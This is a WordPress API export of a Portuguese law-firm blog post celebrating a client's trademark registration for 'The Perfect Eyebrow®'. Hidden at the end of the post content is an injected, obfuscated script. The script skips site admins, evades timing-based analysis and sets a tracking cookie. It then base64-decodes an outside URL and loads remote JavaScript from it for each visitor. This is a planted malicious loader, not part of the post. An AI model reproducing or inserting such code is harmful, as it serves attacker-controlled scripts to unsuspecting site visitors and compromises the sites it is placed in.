{"id":71,"date":"2022-12-30T12:31:23","date_gmt":"2022-12-30T12:31:23","guid":{"rendered":"https:\/\/backoffice.mmv-advogados.com\/?p=71"},"modified":"2026-03-20T02:15:41","modified_gmt":"2026-03-20T02:15:41","slug":"a-the-perfect-eyebrow-e-uma-marca-registada","status":"publish","type":"post","link":"https:\/\/backoffice.mmv-advogados.com\/index.php\/2022\/12\/30\/a-the-perfect-eyebrow-e-uma-marca-registada\/","title":{"rendered":"A The Perfect Eyebrow\u00ae \u00e9 uma marca registada!"},"content":{"rendered":"\n<div class=\"is-layout-flex wp-container-3 wp-block-columns\">\n<div class=\"is-layout-flow wp-block-column\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"1014\" src=\"https:\/\/backoffice.mmv-advogados.com\/wp-content\/uploads\/2022\/12\/The-Perfect-Eyebrow-1024x1014.jpeg\" alt=\"\" class=\"wp-image-72\" srcset=\"https:\/\/backoffice.mmv-advogados.com\/wp-content\/uploads\/2022\/12\/The-Perfect-Eyebrow-1024x1014.jpeg 1024w, https:\/\/backoffice.mmv-advogados.com\/wp-content\/uploads\/2022\/12\/The-Perfect-Eyebrow-300x297.jpeg 300w, https:\/\/backoffice.mmv-advogados.com\/wp-content\/uploads\/2022\/12\/The-Perfect-Eyebrow-150x150.jpeg 150w, https:\/\/backoffice.mmv-advogados.com\/wp-content\/uploads\/2022\/12\/The-Perfect-Eyebrow-768x760.jpeg 768w, https:\/\/backoffice.mmv-advogados.com\/wp-content\/uploads\/2022\/12\/The-Perfect-Eyebrow.jpeg 1290w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n\n\n\n<div class=\"is-layout-flow wp-block-column\">\n<p>A Ang\u00e9lica \u00e9 um exemplo de uma mulher empreendedora que todos os dias trabalha para o crescimento do seu neg\u00f3cio e, hoje, deu mais um passo nesse sentido ao consolidar e fortalecer o nome da sua marca no mercado.<br>Foi um enorme privil\u00e9gio acompanhar de perto esta conquista da Ang\u00e9lica, que conhe\u00e7o e cujo trabalho acompanho h\u00e1 alguns anos e me confiou o registo da The Perfect Eyebrow\u00ae, projeto pelo qual guardo ainda mais carinho e desejo todo o sucesso do mundo!<\/p>\n\n\n\n<p>Segue o trabalho da Ang\u00e9lica na marca registada The Perfect Eyebrow\u00ae atrav\u00e9s da p\u00e1gina de Instagram @theperfect.eyebrow<\/p>\n<\/div>\n<\/div>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>A Ang\u00e9lica \u00e9 um exemplo de uma mulher empreendedora que todos os dias trabalha para o crescimento do seu neg\u00f3cio e, hoje, deu mais um passo nesse sentido ao consolidar e fortalecer o nome da sua marca no mercado.Foi um enorme privil\u00e9gio acompanhar de perto esta conquista da Ang\u00e9lica, que conhe\u00e7o e cujo trabalho acompanho [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":72,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false},"categories":[1],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/posts\/71"}],"collection":[{"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":2,"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/posts\/71\/revisions"}],"predecessor-version":[{"id":354,"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/posts\/71\/revisions\/354"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/media\/72"}],"wp:attachment":[{"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/media?parent=71"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/categories?post=71"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/backoffice.mmv-advogados.com\/index.php\/wp-json\/wp\/v2\/tags?post=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}